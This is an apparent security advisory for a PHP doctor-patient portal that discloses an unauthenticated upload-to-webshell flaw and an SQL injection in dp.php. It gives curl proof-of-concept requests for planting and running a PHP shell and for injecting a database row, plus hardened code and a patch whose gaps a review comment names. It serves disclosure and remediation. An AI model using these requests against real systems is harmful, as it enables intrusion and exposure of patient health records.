# CVE-2026-XXXXX
## Unauthenticated Arbitrary File Upload (RCE) + SQL Injection in Doctor Patient Portal
---
### Advisory Information
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | Doctor Patient Portal |
| **Affected Versions** | All versions through commit `5a138db` |
| **Patched Versions** | None |
| **Severity** | **CRITICAL (CVSS 9.8)** |
| **CWE** | CWE-434 (Unrestricted File Upload) + CWE-89 (SQL Injection) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Repository** | https://github.com/thegr8dev/doctorpatientportal |
| **Stars** | 69 |
---
### Summary
The Doctor Patient Portal contains two critical unauthenticated vulnerabilities in `dp.php`: arbitrary file upload allowing PHP webshell deployment (profile picture upload has zero MIME validation), and SQL injection in the doctor registration INSERT query. No input sanitization or prepared statements are used anywhere in data-entry files.
---
### Affected Component
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | thegr8dev/doctorpatientportal |
| **Vendor** | thegr8dev |
| **Affected Versions** | All (commit `5a138db`) |
| **Patched Versions** | None |
| **File** | `dp.php`, lines 119-123 |
---
### Description
`dp.php` handles doctor registration with no authentication. The profile picture upload has no MIME validation, and all form fields are inserted into SQL without escaping:
**Vulnerability #1 - Unrestricted File Upload (CWE-434):**
```php
// dp.php - unauthenticated, NO MIME check on profile picture
$docpic = $_FILES['newpic']['name']; // user-controlled filename (*.php allowed)
$temp2 = $_FILES['newpic']['tmp_name'];
// ... INSERT doctor record into database ...
mkdir($location, 0777, true);
move_uploaded_file($temp2, "doctor/$docid/img/$docpic"); // PHP file lands in the webroot!
```
Only the document upload checks MIME (`application/pdf` required). The profile picture upload at line 123 has zero validation.
**Vulnerability #2 - SQL Injection (CWE-89):**
```php
// dp.php line 119 - raw $_POST values, no prepare(), no escape
$q = "insert into doctor values('', '$name', '$email', '$pass', '$age', '$phone',
'$status', '$type', '$address', '$gender', '$docid', '$adrid', '$cat','$location2',
'', '$question', '$answer')";
mysqli_query($con, $q);
```
There are no `mysqli_real_escape_string()` or `mysqli_prepare()` calls anywhere in the codebase.
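For comparison, a hardened form of the two code paths above, added here as an example rather than taken from `dp.php`. It assumes `$con` is an open `mysqli` connection, that the `doctor` table has the named columns listed in the query (the original relies on positional values), and that the upload is stored under a server-generated filename instead of `$docpic`.

```php
<?php
// Added example (not the project's code): hardened replacements for the upload
// and INSERT paths in dp.php. Column names of `doctor` are assumed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors become exceptions

function storeProfilePicture(array $file, string $docid): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // Allow-list the extension AND the bytes actually uploaded; the client's
    // Content-Type header is never consulted because the client chooses it.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('invalid image type');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext] || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file content is not an image');
    }
    // docid becomes a path component, so restrict it to a safe character set.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $docid)) {
        throw new RuntimeException('invalid docid');
    }
    $dir = __DIR__ . "/doctor/$docid/img";
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException('cannot create upload dir');
    }
    // Server-generated name: the client's filename never reaches the filesystem.
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('cannot store file');
    }
    return $dest;
}

function insertDoctor(mysqli $con, array $d): void
{
    // Every value is a bound parameter; user input never becomes query text.
    $stmt = $con->prepare(
        'INSERT INTO doctor (name, email, pass, age, phone, status, type, address, gender,
                             docid, adrid, cat, location, question, answer)
         VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)'
    );
    $stmt->bind_param(str_repeat('s', 15), $d['name'], $d['email'], $d['pass'], $d['age'],
        $d['phone'], $d['status'], $d['type'], $d['address'], $d['gender'], $d['docid'],
        $d['adrid'], $d['cat'], $d['location'], $d['question'], $d['answer']);
    $stmt->execute();
}
```

Serving the `doctor/*/img/` directory with PHP execution disabled (or from outside the webroot) is the second layer; the allow-list alone should not be the only control.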
---
### Proof of Concept
**Step 1 - Register as doctor with PHP webshell as profile picture:**
```bash
curl -X POST "http://target/dp.php" \
-F "btn_doc=1" \
-F "name=Hacker" \
-F "email=hack@evil.com" \
-F "password=Pass123" \
-F "age=30" \
-F "phone=1234567890" \
-F "address=123+Main+St" \
-F "gender=Male" \
-F "docid=DOC001" \
-F "adrid=ADR001" \
-F "cat=General" \
-F "question=Favorite+color" \
-F "answer=blue" \
-F "file=@document.pdf;type=application/pdf" \
-F "newpic=@shell.php;type=image/jpeg"
# Profile pic shell.php uploaded to doctor/DOC001/img/shell.php
```
**Step 2 - Execute commands:**
```bash
curl "http://target/doctor/DOC001/img/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
```
**Step 3 - SQL Injection (via email parameter):**
```bash
curl -X POST "http://target/dp.php" \
-F "btn_doc=1" \
-F "email=hack@evil.com', 'pass', 30, '123', 'pending', 'doc', 'addr', 'M', 'DOC002', 'ADR', 'General', './x', '', 'q', 'a')-- " \
-F "password=x" -F "name=x" -F "age=30" -F "phone=1" -F "address=x" \
-F "gender=M" -F "docid=DOC002" -F "adrid=ADR" -F "cat=General" \
-F "question=q" -F "answer=a" \
-F "file=@doc.pdf;type=application/pdf" \
-F "newpic=@test.jpg"
# Injects arbitrary doctor record via email SQL injection
```
---
### Impact
| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | RCE via webshell: read patient records, prescriptions, personal data |
| Integrity | **HIGH** | SQLi: arbitrary INSERT + RCE: modify any file |
| Availability | **HIGH** | Delete files, drop tables |
**Data at risk:** Patient medical records, doctor credentials, prescriptions, personal health information.
---
### Patches
```diff
+ $allowed = ['jpg','jpeg','png'];
+ $ext = strtolower(pathinfo($_FILES['newpic']['name'], PATHINFO_EXTENSION));
+ if(!in_array($ext, $allowed)) { die("Invalid image type"); }
- $q = "insert into doctor values('', '$name', ...)";
- mysqli_query($con, $q);
+ $stmt = mysqli_prepare($con, "INSERT INTO doctor VALUES (?,?,?,...)");
+ mysqli_stmt_bind_param($stmt, "ssss...", $name, $email, ...);
+ mysqli_stmt_execute($stmt);
```
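Review bot: the extension allow-list in the first three `+` lines does not change what reaches `move_uploaded_file`: the destination path is still built from `$docpic`, the client-supplied filename, so the name written to the webroot remains attacker-controlled even after the check passes. Store the file under a server-generated name (for example `bin2hex(random_bytes(16)) . '.' . $ext`) and verify the content with `finfo`/`getimagesize` rather than the name alone. In the prepared-statement lines, the `...` placeholders leave the placeholder count and the `bind_param` type string unspecified; the original INSERT supplies 17 positional values, so the final patch needs the full column list and a matching type string, or the statement will fail to prepare.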
---
### References
| Type | URL |
|------|-----|
| Repository | https://github.com/thegr8dev/doctorpatientportal |
| Vulnerable code | https://github.com/thegr8dev/doctorpatientportal/blob/main/dp.php#L123 |
| CWE-434 | https://cwe.mitre.org/data/definitions/434.html |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
---
### Verification
```bash
git clone https://github.com/thegr8dev/doctorpatientportal && cd *
grep -n "move_uploaded_file.*newpic\|move_uploaded_file.*docpic" dp.php # line 123 - no MIME check
grep -n "mysqli_query.*insert" dp.php # line 120 - raw SQL
grep -c "prepare\|real_escape" dp.php # 0
```
---
### Credits
| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |
---
### Timeline
| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered and verified |
| 2026-06-28 | Vendor notified via private disclosure |
| TBD | Vendor acknowledgment / response |
| TBD | CVE ID assigned |
| TBD + 90 days | Coordinated public disclosure |
---
### CVSS v3.1
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H -> 9.8 CRITICAL
AV:N - Remote over HTTP
AC:L - Simple multipart POST
PR:N - No authentication (doctor registration is public)
UI:N - No user interaction
S:U  - Same security context
C:H  - RCE webshell: read patient DB, medical records
I:H  - SQLi: arbitrary INSERT + RCE: overwrite any file
A:H  - RCE: delete files, drop database
```